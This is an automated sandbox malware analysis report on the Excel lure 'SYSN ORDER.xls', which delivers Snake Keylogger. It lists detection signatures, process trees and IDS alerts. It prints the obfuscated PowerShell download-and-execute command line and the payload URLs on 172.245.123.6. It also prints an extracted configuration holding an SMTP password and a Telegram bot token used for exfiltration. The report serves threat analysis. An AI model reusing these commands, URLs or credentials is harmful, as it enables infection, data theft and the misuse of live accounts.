Windows Analysis Report
SYSN ORDER.xls

Overview

General Information

Sample name: SYSN ORDER.xls
Analysis ID: 1522511
MD5: 673bd0aa988ca4a1ef05edb3d5b68d60
SHA1: 4b7d31c4d6a4cd94e95fdd7c35bca86f6e13ec38
SHA256: 9db5ab81cbe373ea471f128ad2fdc98c9eb98c1ff3991046f7ca54823d9a6107
Tags: xls, user-abuse_ch
Infos:

Detection

Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Snake Keylogger
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: System File Execution Location Anomaly
Suspicious command line found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Sigma detected: Suspicious Office Outbound Connections
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3344 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • mshta.exe (PID: 3624 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • cmd.exe (PID: 3712 cmdline: "C:\Windows\system32\cmd.exe" "/C POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'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'+[chAR]0X22+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • powershell.exe (PID: 3736 cmdline: POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'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'+[chAR]0X22+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
          • csc.exe (PID: 3844 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
            • cvtres.exe (PID: 3852 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4348.tmp" "c:\Users\user\AppData\Local\Temp\ngxpd0hb\CSCA3EB236CC00F4C599499BBB2E0A3996.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • dllhost.exe (PID: 3944 cmdline: "C:\Users\user\AppData\Roaming\dllhost.exe" MD5: 7F0098DCC054A27F80296ADF300573EC)
            • RegSvcs.exe (PID: 3108 cmdline: "C:\Users\user\AppData\Roaming\dllhost.exe" MD5: 19855C0DC5BEC9FDF925307C57F9F5FC)
    • mshta.exe (PID: 3996 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • cmd.exe (PID: 2672 cmdline: "C:\Windows\system32\cmd.exe" "/C POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'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'+[chAR]0X22+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • powershell.exe (PID: 2108 cmdline: POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'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'+[chAR]0X22+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
          • csc.exe (PID: 1692 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tnesdt30\tnesdt30.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
            • cvtres.exe (PID: 1976 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES866F.tmp" "c:\Users\user\AppData\Local\Temp\tnesdt30\CSC4AC68FDA20F44DF3BBC22D1FFF1AFB9.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • dllhost.exe (PID: 1960 cmdline: "C:\Users\user\AppData\Roaming\dllhost.exe" MD5: 7F0098DCC054A27F80296ADF300573EC)
            • RegSvcs.exe (PID: 3176 cmdline: "C:\Users\user\AppData\Roaming\dllhost.exe" MD5: 19855C0DC5BEC9FDF925307C57F9F5FC)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
404 Keylogger, Snake Keylogger | Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "Telegram", "Username": "teilecar@teilecar.com", "Password": "Manta924porsche=911", "Host": "mail.teilecar.com", "Port": "587", "Token": "7999924339:AAGXruqvzq9xMXJCD4qt4gTPOUJ8WiZw7pY", "Chat_id": "6183379562", "Version": "5.1"}
Source | Rule | Description | Author | Strings
0000000E.00000002.630259466.0000000002561000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security |
0000000E.00000002.630259466.000000000270D000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security |
00000017.00000002.630215962.000000000250D000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security |
00000017.00000002.630215962.0000000002361000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security |
00000017.00000002.629152726.0000000000416000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
            System Summary

            Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3344, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\IEnetbokkworkingforupdate[1].hta
            Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3736, TargetFilename: C:\Users\user\AppData\Roaming\dllhost.exe
            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/C POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'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'+[chAR]0X22+'))')))"
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3344, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 3624, ProcessName: mshta.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\user\AppData\Roaming\dllhost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\dllhost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\dllhost.exe, NewProcessName: C:\Users\user\AppData\Roaming\dllhost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\dllhost.exe, ParentCommandLine: POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'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'+[chAR]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3736, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\dllhost.exe" , ProcessId: 3944, ProcessName: dllhost.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'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'+[chAR]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3736, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.cmdline", ProcessId: 3844, ProcessName: csc.exe
            Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 172.67.216.244, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3344, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
            Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3736, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\dllhost[1].exe
            Source: DNS queryAuthor: Brandon George (blog post), Thomas Patzke: Data: Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, QueryName: checkip.dyndns.org
            Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3344, Protocol: tcp, SourceIp: 172.67.216.244, SourceIsIpv6: false, SourcePort: 443
            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3736, TargetFilename: C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.cmdline
            Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3344, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'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'+[chAR]0X22+'))')))"
            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3736, TargetFilename: C:\Users\user\AppData\Local\Temp\xe1pvlqt.go1.ps1

            Data Obfuscation

            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'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'+[chAR]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3736, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.cmdline", ProcessId: 3844, ProcessName: csc.exe
            Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
            2024-09-30T10:12:20.043508+0200 | 2024197 | 1 | A Network Trojan was detected | 172.245.123.6 | 80 | 192.168.2.22 | 49164 | TCP
            2024-09-30T10:12:22.720605+0200 | 2024197 | 1 | A Network Trojan was detected | 172.245.123.6 | 80 | 192.168.2.22 | 49166 | TCP
            2024-09-30T10:12:20.038629+0200 | 2024449 | 1 | Attempted User Privilege Gain | 192.168.2.22 | 49164 | 172.245.123.6 | 80 | TCP
            2024-09-30T10:12:22.720603+0200 | 2024449 | 1 | Attempted User Privilege Gain | 192.168.2.22 | 49166 | 172.245.123.6 | 80 | TCP
            2024-09-30T10:12:44.169207+0200 | 2024449 | 1 | Attempted User Privilege Gain | 192.168.2.22 | 49172 | 172.245.123.6 | 80 | TCP
            2024-09-30T10:12:50.120555+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.22 | 49175 | 188.114.96.3 | 443 | TCP
            2024-09-30T10:12:53.392220+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.22 | 49179 | 188.114.97.3 | 443 | TCP
            2024-09-30T10:13:01.037486+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.22 | 49188 | 188.114.96.3 | 443 | TCP
            2024-09-30T10:13:02.434337+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.22 | 49190 | 188.114.96.3 | 443 | TCP
            2024-09-30T10:13:07.171691+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.22 | 49196 | 188.114.97.3 | 443 | TCP
            2024-09-30T10:13:09.823366+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.22 | 49200 | 188.114.97.3 | 443 | TCP
            2024-09-30T10:12:48.103213+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.22 | 49173 | 193.122.130.0 | 80 | TCP
            2024-09-30T10:12:49.716717+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.22 | 49173 | 193.122.130.0 | 80 | TCP
            2024-09-30T10:12:51.550829+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.22 | 49176 | 132.226.8.169 | 80 | TCP
            2024-09-30T10:12:52.906975+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.22 | 49178 | 132.226.247.73 | 80 | TCP
            2024-09-30T10:13:00.977373+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.22 | 49187 | 193.122.6.168 | 80 | TCP
            2024-09-30T10:13:02.049650+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.22 | 49187 | 193.122.6.168 | 80 | TCP
            2024-09-30T10:13:03.528766+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.22 | 49191 | 193.122.130.0 | 80 | TCP

            AV Detection

            Source: 0000000E.00000002.630259466.0000000002561000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Username": "teilecar@teilecar.com", "Password": "Manta924porsche=911", "Host": "mail.teilecar.com", "Port": "587", "Token": "7999924339:AAGXruqvzq9xMXJCD4qt4gTPOUJ8WiZw7pY", "Chat_id": "6183379562", "Version": "5.1"}
            Source: http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta | Virustotal: Detection: 8%
            Source: http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.htahttp://172.245.123.6/xampp/crio/IEnetbo | Virustotal: Detection: 7%
            Source: http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta... | Virustotal: Detection: 7%
            Source: http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.htaC: | Virustotal: Detection: 7%
            Source: http://172.245.123.6/770/dllhost.exes | Virustotal: Detection: 7%
            Source: SYSN ORDER.xls | ReversingLabs: Detection: 21%
            Source: SYSN ORDER.xls | Virustotal: Detection: 25%
            Source: C:\Users\user\AppData\Roaming\dllhost.exe | Joe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\dllhost[1].exe | Joe Sandbox ML: detected
            Source: SYSN ORDER.xls | Joe Sandbox ML: detected

            Location Tracking

            Source: unknown | DNS query: name: reallyfreegeoip.org
            Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49174 version: TLS 1.0
            Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49189 version: TLS 1.0
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
            Source: unknown | HTTPS traffic detected: 172.67.216.244:443 -> 192.168.2.22:49163 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 172.67.216.244:443 -> 192.168.2.22:49165 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 104.21.78.54:443 -> 192.168.2.22:49170 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 104.21.78.54:443 -> 192.168.2.22:49169 version: TLS 1.2
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\tnesdt30\tnesdt30.pdbhP source: powershell.exe, 00000011.00000002.478774316.0000000002839000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\tnesdt30\tnesdt30.pdb source: powershell.exe, 00000011.00000002.478774316.0000000002839000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: .pdb- source: powershell.exe, 00000007.00000002.450490527.000000001C26D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: dllhost.exe, 0000000B.00000003.457458301.0000000003900000.00000004.00001000.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000003.459419334.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, dllhost.exe, 00000016.00000003.492203935.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, dllhost.exe, 00000016.00000003.492301433.0000000002DD0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: .pdb) source: powershell.exe, 00000011.00000002.482289693.000000001AC63000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.pdb source: powershell.exe, 00000007.00000002.441192247.00000000028AA000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.pdbhP source: powershell.exe, 00000007.00000002.441192247.00000000028AA000.00000004.00000800.00020000.00000000.sdmp

            Software Vulnerabilities

            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\mshta.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 002D6E61h23_2_002D6BA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 002D7721h23_2_002D7461
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h23_2_002D566A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0044C729h23_2_0044C480
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 004446F1h23_2_00444448
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00449711h23_2_00449468
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 004412D1h23_2_00441028
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0044C2D1h23_2_0044C028
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00441B81h23_2_004418D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0044CC15h23_2_0044C8D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00449B91h23_2_004498E8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00444FA1h23_2_00444CF8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00441729h23_2_00441480
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00444B49h23_2_004448A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00449FE9h23_2_00449D40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 004453F9h23_2_00445150
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00441FD9h23_2_00441D30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00442889h23_2_004425E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0044A899h23_2_0044A5F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00442431h23_2_00442188
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0044A441h23_2_0044A198
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]23_2_004479AE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00445851h23_2_004455A8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0044ACF1h23_2_0044AA48
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00445CA9h23_2_00445A00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00442CE1h23_2_00442A38
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00443591h23_2_004432E8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00443139h23_2_00442E90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]23_2_00447698
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0044B149h23_2_0044AEA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 004439E9h23_2_00443740
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00440A21h23_2_00440778
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0044BA21h23_2_0044B778
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 004405C9h23_2_00440320
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0044B5CAh23_2_0044B320
